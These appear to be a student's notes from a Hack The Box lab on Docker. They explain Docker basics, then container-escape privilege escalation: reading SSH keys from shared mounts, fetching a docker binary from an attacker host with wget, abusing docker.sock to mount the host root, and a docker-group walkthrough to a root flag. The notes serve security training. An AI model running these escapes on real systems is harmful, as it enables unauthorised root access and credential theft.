# Intro
- Docker is an open-source tool that provides a portable and consistent runtime environments for software apps
- Docker uses containers as isolated environments in user space that run at the OS level, which share the fs and system resources
- One advantage of containerization is that it consumes significantly fewer resources than a traditional server or VM
- The Docker architecture uses a client-serve model with two components:
- Docker client: acts as our interface for issuing commands and interacting with the Docker ecosystem
- Docker daemon: responsible for executing commands and managing containers
## Docker Daemon
- The `Docker Daemon` (or Docker server) is a critical part of the Docker exosystem that plays a pivotal role in container mgmt and orchestration
- The Docker Daemon is the powerhouse of the Docker ecosystem with several key responsibilities:
- running Docker containers
- interacting with Docker containers
- managing Docker containers on the host system
- The Docker Daemon handles the core containerization functionality and also coordinates the creation, execution, and monitoring of Docker containers such as maintaining their isolation from the host and other containers
- This isolation ensures that containers operate independently, with their own file systems, processes, and network interfaces
- Furthermore, it handles Docker image mgnt like pulling images from registries (e.g., [Docker Hub](https://hub.docker.com/) or private repos) and storing them locally
- These images serve as the building blocks for creating containers
- The Docker Daemon also facilitates container networking by creating virtual networks and managing network interfaces
- It enables containers to communicate with each other and the outside world through network ports, IP addresses, and DNS resolution
- When we interact with Docker, we issue commands through the `Docker Client`, which communicates with the Docker Daemon (through a `RESTful API` or a `Unix socket`) and serves as our primary means of interacting with Docker
- We also have the ability to create, start, stop, manage, remove containers, search, and download Docker images
- Another client for Docker is `Docker Compose`
- Docker Compose is a tool that simplifies the orchestration of multiple Docker containers as a single application
- This allows us to define our application's multi-container architecture using a declarative `YAML` (`.yaml`/`.yml`) file
- With it, we can specify the services comprising our application, their dependencies, and their configs
## Docker Images and Containers
- A Docker `image` is essentially a blueprint or a template for creating containers
- It encapsulates everything needed to run an application, including the application's code, dependencies, libraries, and configuration
- An `image` is a self-contained, read-only package that ensures consistency and reproducibility across different environments
- We can create images using a text file called a `Dockerfile`, which defines the steps and instructions for building the image
- Flowing therefrom, a Docker `container` is an instance of a Docker `image`
- The container is a lightweight, isolated, and executable environment that runs applications
- When we launch a container, it is created from a specific image, and the container inherits all the properties and configurations defined in that image
# Docker Privesc
## Docker Shared Dirs
- When using Docker, shared directories (volume mounts) can bridge the gap between the host system and the container's fs
- When we get access to the docker container and enumerate it locally, we might find additional (non-standard) directories on the docker’s filesystem
- Below shows an example where we are able to view an `id_rsa` in a user's home dir
```shell-session
root@container:~$ cd /hostsystem/home/cry0l1t3
root@container:/hostsystem/home/cry0l1t3$ ls -l
-rw------- 1 cry0l1t3 cry0l1t3 12559 Jun 30 15:09 .bash_history
-rw-r--r-- 1 cry0l1t3 cry0l1t3 220 Jun 30 15:09 .bash_logout
-rw-r--r-- 1 cry0l1t3 cry0l1t3 3771 Jun 30 15:09 .bashrc
drwxr-x--- 10 cry0l1t3 cry0l1t3 4096 Jun 30 15:09 .ssh
root@container:/hostsystem/home/cry0l1t3$ cat .ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
<SNIP>
```
## Accessible Docker Socket
- A Docker socket or Docker daemon socket is a special file that allows us and processes to communicate with the Docker daemon
- This communication occurs either through a Unix socket or a network socket, depending on the configuration of our Docker setup
- The Docker socket acts as a bridge, facilitating communication between the Docker client and the Docker daemon
- When we issue a command through the Docker CLI, the Docker client sends the command to the Docker socket, and the Docker daemon, in turn, processes the command and carries out the requested actions
- Docker sockets require appropriate permissions to ensure secure communication and prevent unauthorized access
- Access to the Docker socket is typically restricted to specific users or user groups, ensuring that only trusted individuals can issue commands and interact with the Docker daemon
- By exposing the Docker socket over a network interface, we can remotely manage Docker hosts, issue commands, and control containers and other resources
- This remote API access expands the possibilities for distributed Docker setups and remote management scenarios
- In contrast, depending on the configuration, there are many ways where automated processes or tasks can be stored
- Those files can contain very useful information for us that we can use to escape the Docker container
- First enum `docker.sock` from within the container \
```bash
htb-student@container:~/app$ ls -al
total 8
drwxr-xr-x 1 htb-student htb-student 4096 Jun 30 15:12 .
drwxr-xr-x 1 root root 4096 Jun 30 15:12 ..
srw-rw---- 1 root root 0 Jun 30 15:27 docker.sock
```
- Now, use the `docker` binary from within the container to interact with the socket and enumerate what docker containers are already running
- If not installed, then we can download it [here](https://master.dockerproject.com/linux/x86_64/docker) and upload it to the Docker container
```bash
htb-student@container:/tmp$ wget https://<parrot-os>:443/docker -O docker
htb-student@container:/tmp$ chmod +x docker
htb-student@container:/tmp$ ls -l
-rwxr-xr-x 1 htb-student htb-student 0 Jun 30 15:27 docker
htb-student@container:~/tmp$ /tmp/docker -H unix:///app/docker.sock ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
3fe8a4782311 main_app "/docker-entry.s..." 3 days ago Up 12 minutes 443/tcp app
```
- Next, we can create our own Docker container that maps the host’s root directory (`/`) to the `/hostsystem` directory to the container that we have access to currently
- With this, we will get full access to the host system
- Therefore, we must map these directories accordingly and use the `main_app` Docker image
```bash
htb-student@container:/app$ /tmp/docker -H unix:///app/docker.sock run --rm -d --privileged -v /:/hostsystem main_app
htb-student@container:~/app$ /tmp/docker -H unix:///app/docker.sock ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
7ae3bcc818af main_app "/docker-entry.s..." 12 seconds ago Up 8 seconds 443/tcp app
3fe8a4782311 main_app "/docker-entry.s..." 3 days ago Up 17 minutes 443/tcp app
<SNIP>
```
- Finally, we can log in to the new privileged Docker container with the ID `7ae3bcc818af` and navigate to the `/hostsystem`
```bash
htb-student@container:/app$ /tmp/docker -H unix:///app/docker.sock exec -it 7ae3bcc818af /bin/bash
root@7ae3bcc818af:~# cat /hostsystem/root/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
<SNIP>
```
## Docker Group
- To gain root privs through Docker, the user we are logged in with must be in the `docker` group
- This group access allows the current user to use and control the Docker daemon
- Enum with the `id` command
- Alternatively to the above, Docker may have SUID set, or we are in the Sudoers file, which permits us to run `docker` as root
- All three options allow us to work with Docker to escalate our privileges
- Most hosts have a direct internet connection because the base images and containers must be downloaded
- Nonetheless, many hosts may be disconnected from the internet at night and outside working hours for security reasons
- However, if these hosts are located in a network where, for example, a web server has to pass through, it can still be reached
- To see which images exist and which we can access, issue the below command:
```bash
docker image ls
```
## Writeable Docker Socket
- A writeable Docker socket is usually located in `/var/run/docker.sock`
- Because basically, this can only be written by the root or docker group
- If we act as a user, not in one of these two groups, and the Docker socket still has the privileges to be writable, then we can still use this case to escalate our privileges
```bash
docker-user@nix02:~$ docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it ubuntu chroot /mnt bash
root@ubuntu:~# ls -l
```
---
# Exercise
- `ping` test ![[images/Pasted image 20260208203537.png]]
- `nmap` scans ![[images/Pasted image 20260208203613.png]]
- `ssh` into box with given creds ![[images/Pasted image 20260208203702.png]]
- light internal enum ![[images/Pasted image 20260208203735.png]]
- we are a member of the `docker` group
- enum available docker images ![[images/Pasted image 20260208203925.png]]
- simply, run ubuntu in a container and gain access to full local system fs with below command
```bash
docker run -v /:/mnt -it ubuntu
```
![[images/Pasted image 20260208204124.png]]
- navigate into `/mnt` dir for local system fs
- check `/mnt/root` for flag > there it is ![[images/Pasted image 20260208204312.png]]